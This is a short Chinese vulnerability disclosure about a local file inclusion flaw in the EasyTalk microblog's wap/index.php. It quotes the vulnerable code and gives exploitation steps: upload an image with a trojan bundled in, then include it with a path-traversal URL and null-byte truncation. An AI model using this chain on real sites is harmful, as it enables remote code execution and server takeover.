发布作者:sw0rder
漏洞描述:从源码上看,只需上传copy捆绑的木马即可正常包含。
漏洞文件在“wap/index.php”,关键代码如下:
<?php
error_reporting(7);
define('IN_ET', TRUE);
include('../include/etfunctions.func.php');
include('../include/db_mysql.class.php');
include('../config.inc.php');
$db = new dbstuff;
$db->connect($server,$db_username,$db_password,$db_name, $pconnect,true);
@mysql_query("set names utf8");
include('include/global.func.php')
$op=$_GET['op']?$_GET['op']:"index"; /*Get方式获取op值并没有过滤直接放入op by:sw0rder*/
$addtime=time();
$action=$_POST['action'];
$act=$_GET['act'];
$page=$_GET['page']?$_GET['page']:1;
/*往下看*/
if (!$user['user_id']) $head="EasyTalk微博客 随时随地";
else $head="欢迎您,".$user['nickname'];
if (!$user['user_id'] && $op=="index") $op="login";
include_once('a/'.$op.'.inc.php'); /*这里包含,需截断 by:sw0rder*/ |
具体利用:
新建一个账户,在首页写话题处上传捆后的图片,这里传后可以显示出文件名,在服务器中会出现两个图片,一个源图片,一个处理过的。
且已自身 id 为目录命名(id 可从右上方看到),那么图片路径就是:attachments/photo/user_id/图片名.jpg。
测试:
http://127.0.0.1/easytalk/wap/indextest.php?op=../../attachments/photo/user_id/图片.jpg%00.
文章作者
Nuclear'Atk
上次更新
2011-01-27
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。